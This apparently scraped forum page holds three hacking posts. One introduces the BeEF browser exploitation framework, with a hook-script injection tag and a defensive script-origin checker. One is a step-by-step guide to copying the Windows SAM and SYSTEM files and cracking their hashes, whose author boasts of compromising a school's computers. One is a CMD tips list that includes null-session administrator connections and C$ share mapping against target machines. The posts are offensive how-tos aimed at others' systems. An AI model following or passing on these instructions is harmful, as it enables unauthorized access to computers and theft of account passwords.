
Skyline Geek

    Hacking with BEeF, May 3, 2017
  1. Skyline Geek


    What is BEeF?
    When skids are asked what they use to hack, Metasploit is the usual answer, mostly because they don't know any other way to do it. BEeF (I don't know what the lower-case e is for) stands for Browser Exploitation Framework and is the equivalent of Metasploit for browsers. In the land of web-borne and mobile exploitation, BeEF focuses on one backdoor, which is the web browser.

    How is BeEF used for hacking?
    Before being able to use BeEF's framework one must first "hook" a browser; BeEF provides a hook URL that can be used for this. A popular way of hooking a target is by putting the hook script into your webpage. After the target is "hooked" you can begin using the BeEF framework's many commands, including using Metasploit.

    Running BeEF:
    The first thing you're going to have to do is cd to where BeEF is located; on Kali you can do this by inputting the command below:
     cd /usr/share/beef-xss
    Then run the BeEF script.
    This is the console output that should pop up after you run the script.

    BeEF console.

    I know it's a bit confusing but I'll elaborate: Hook UI is the interface where commands are sent and your list of zombies is viewed; we'll be looking into that in a bit. First we're going to talk about the hook URL, which is what hooks the victim's browser. Below I'll put an example of some web code which should hopefully clarify how this hook URL is used.

    <script src="" type="text/java"></script>
    The above is an example of me injecting my hook URL into an HTML page. I am sure this is not the only way to get someone to run your shit; Google or get creative with it.

    The BeEF Interface:
    Opening the BeEF UI URL will greet you with a browser interface and a log-in screen; the default username and password are both "beef". After logging in you'll be led to the interface where commands can be sent to hooked browsers.

    What the interface looks like.
    BeEF GUI.

    One very important detail to look at is the traffic light system that BeEF uses to tell you what exploits work on the victim.
    • Green means that you can use this exploit on the victim without him knowing.
    • Orange means you can use an exploit but it may be visible to the target.
    • Red means the exploit CANNOT be used against the target.
    • Grey means the target hasn't been measured on this particular exploit.

    That concludes our introduction to BeEF, I hope you learned something from this thread as I had a lot of fun making it. I don't usually contribute shit because I'm lazy but hopefully that will change.

    Additional Reading:
    Source #LearnHacking
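    From the site owner's side, a hook like the one above is just an extra script tag pointing at a host that was never added on purpose. The following Python script is an added example (not from the original post or the BeEF project): it lists every script source in a page and flags those whose origin is not on an allowlist, which is how a page owner would spot an injected hook URL. The allowlist, the sample HTML and the 203.0.113.5:3000 address are all constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allowlist: origins the site owner knowingly loads scripts from.
ALLOWED_ORIGINS = {"https://www.example.com", "https://cdn.example.com"}


class ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag in a document."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.sources.append(value)


def script_origin(src, page_origin):
    """Return the scheme://host[:port] a script src resolves to.
    Relative paths belong to the page's own origin; protocol-relative
    URLs (//host/x) inherit the page's scheme."""
    parsed = urlparse(src)
    if not parsed.netloc:
        return page_origin
    scheme = parsed.scheme or urlparse(page_origin).scheme
    return f"{scheme}://{parsed.netloc}"


def find_unexpected_scripts(html, page_origin, allowed=ALLOWED_ORIGINS):
    """Return the script src values whose origin is not allowlisted."""
    collector = ScriptSrcCollector()
    collector.feed(html)
    return [s for s in collector.sources
            if script_origin(s, page_origin) not in allowed]


# Constructed sample page: two legitimate scripts plus one injected tag
# loading from an address the site owner never approved.
SAMPLE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.example.com/lib.js" type="text/javascript"></script>
<script src="http://203.0.113.5:3000/hook.js" type="text/javascript"></script>
</head><body></body></html>"""

if __name__ == "__main__":
    for src in find_unexpected_scripts(SAMPLE_HTML, "https://www.example.com"):
        print("unexpected script origin:", src)
```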
  2. How to hack Windows Admin password, Apr 30, 2017
  3. Skyline Geek


    ok..... here are the full details.....

    this works on all windows till now ....

    Programs needed: SAMInside (doesn't matter which version or if demo)
    LC4 or LC5 (lophtcrack)( must be full version)
    NTFSPro (doesn't matter if demo)
    any bootdisk maker

    this works even if syskey encryption is employed...

    if it is FAT filesystem...

    just copy the sam file to an empty floppy disk (or you can prefer a PenDrive as well :p ) and take it home. I'll tell u what to do with it later... DON'T DELETE THE ORIGINAL SAM FILE. just remove its attributes. the sam file is a file called SAM with no extension. YOU MUST ALSO GET.... a file called SYSTEM which is in the same folder as SAM. both files have no extensions...

    if it is NTFS....

    u have to download a program called NTFSPro.... it allows u to read from ntfs drives... the demo version allows read only. the full version is read-write.... you use the program to create an unbootable disk (so u will still need another bootable disk and an empty disk) that has the required files to access NTFS.

    use the boot disk to get into dos, then use the disks created with ntfspro to be able to access the filesystem, then copy the SAM and SYSTEM files to another empty disk to take home....

    AT HOME: u have to get a program called SAMInside. it doesn't matter if it is demo version. SAMInside will open the SAM file and extract all the user account information and their passwords, including administrator. SAMInside will ask for the SYSTEM file too if the computer you took the SAM file from has syskey enabled. syskey encrypts the SAM file. SAMInside uses the SYSTEM file to decrypt the SAM file. After SAMInside finishes, u still see user accounts and hashes beside them. the hashes are the encoded passwords. Use SAMInside to export the accounts and their hashes as a pwdump file into another program, called LophtCrack. it is currently in version 5, it is named LC5. the previous version, LC4 is just as good. u need the full or cracked version of the program. LC5 uses a brute force method by trying all possible combinations of letters, numbers, and unprintable characters to find the correct password from the hashes in the pwdump file imported into it from SAMInside. This process of trying all passwords might take 5 minutes if the password is easy, up to a year if the password is long and hard (really really hard). LC5 however, unlike LC4, is almost 100 times faster. both can be configured to try dictionary and common words before using all possible combinations of everything. Once the correct password is found, it will display the passwords in clear beside each account, including administrator.

    I've used this method so many times. I've compromised the whole school computer infrastructure. LC4 usually took between 1 second and 10 minutes to find the passwords because they were common words found in any English dictionary. I haven't used LC5 yet.

    If there is anything unclear, anything I overlooked, plz tell me so that I can turn this into a very easy to follow tutorial to help anybody crack any windows pass.
  4. Useful Things to do on CMD !, Apr 26, 2017
  5. Skyline Geek

    Ever thought hacking could be so easy on Windows? Here are a few cool basic tricks you can do on your Windows machine using CMD.

    First, open your Network Connection, right click and select Properties. Then select TCP/IP and click on Properties again. Now click on Advanced and the WINS tab. Select Default for NetBIOS.

    Now back to the main Local Area Connection window, select File and Print Sharing for Mic*ft Networks and hit enter.

    This is just to make sure you have NetBIOS enabled. We will have some fun with NetBIOS on CMD.

    First thing you need to know is some very helpful commands to use on CMD (Command Prompt).

    In case you don't know how to get CMD open in your box, then click on Start, then Run, then type "cmd" (no quotes, of course... you know the drill).

    Back to commands:

    net view
    net use
    net user

    In case you don't know some of them, then just type the command on CMD and hit enter. A little help will show up on your screen. Read it and understand what the command does.

    Let's start easy...

    1) ping : This command will allow you to know if the host you are pinging is alive, which means if it is up at the time of executing the "ping" command.

    ping x.x.x.x (x is the IP address)

    ping http://www.whatever.com (http://www.whatever.com is the website you want to ping, but you don't know the IP)
    OBS: Keep in mind that if the host you are pinging is blocking ICMP packets, then the result will be host down.

    2) nslookup : This command has many functionalities.

    One is for resolving DNS into IP.
    Let's say you know the website URL but you don't know its IP (and you want to find out).

    nslookup http://www.whatever.com (http://www.whatever.com is the website you want to find out the IP)
    Now, another really nice function of nslookup is to find out the IP of specific mail servers.

    nslookup (enter)
    set type=mx (enter)
    This command will give you the mail server IP of yahoo.com. You can use whatever server you want and if it is listed on DNS, then you get the IP. Simple, isn't it?

    OK, now why would you want to have an IP of a mail server?
    To send spoofed mail to your friends or even for SE.
    In case you looking for "How to spoof email", then look for my "How to spoof email tutorial" http://www.infowar.c....&threadid=2360

    3) tracert : This command will give you the hops that a packet will travel to reach its final destination.

    OBS: This command is good to know the route a packet takes before it goes to the target box.

    tracert x.x.x.x (x is the IP address)

    tracert http://www.whatever.com (http://www.whatever.com is the website whose IP you don't know)

    4) arp : This command will show you the arp table. This is good to know if someone is doing arp poisoning in your LAN.

    arp -a

    5) route : This command will show you the routing table, gateway, interface and metric.

    route print

    6) ipconfig : This command will show tons of very helpful things.

    Your IP, gateway, dns in use.


    ipconfig /all
    This command will give you all that info, but for all the networks you might have.

    Also, in case you have a dynamic IP and want to change it, then type...

    ipconfig /release (this will release your IP)
    ipconfig /renew (this will renew your IP)
    OBS: Keep in mind that those commands will change your IP, but the new IP will still be tied to you. So don't do anything stupid.

    7) netstat : This command will show you connections to your box.


    netstat -a (this will show you all the listening ports and connection with DNS names)
    netstat -n (this will show you all the open connection with IP addresses)
    netstat -an (this will combine both of the above)
    net view x.x.x.x or computername (will list the available shared folders on the target box)

    Now some hints:

    net use \\ipaddress\ipc$ "" /user:administrator
    (this command will allow you to connect to the target box as administrator)
    Now if you want to connect to the target box and browse the entire C drive, then use this command:

    net use K: \\computername\C$
    (this will create a virtual drive on your "my computer" folder)
    OBS: Keep in mind that this will only work if the target box doesn't have an administrator password set.

    And least but not last, the "help" command.


    This command will help you to understand what a command does and all the switches available for it.
    Very useful if you know the command, but forgot the right switch.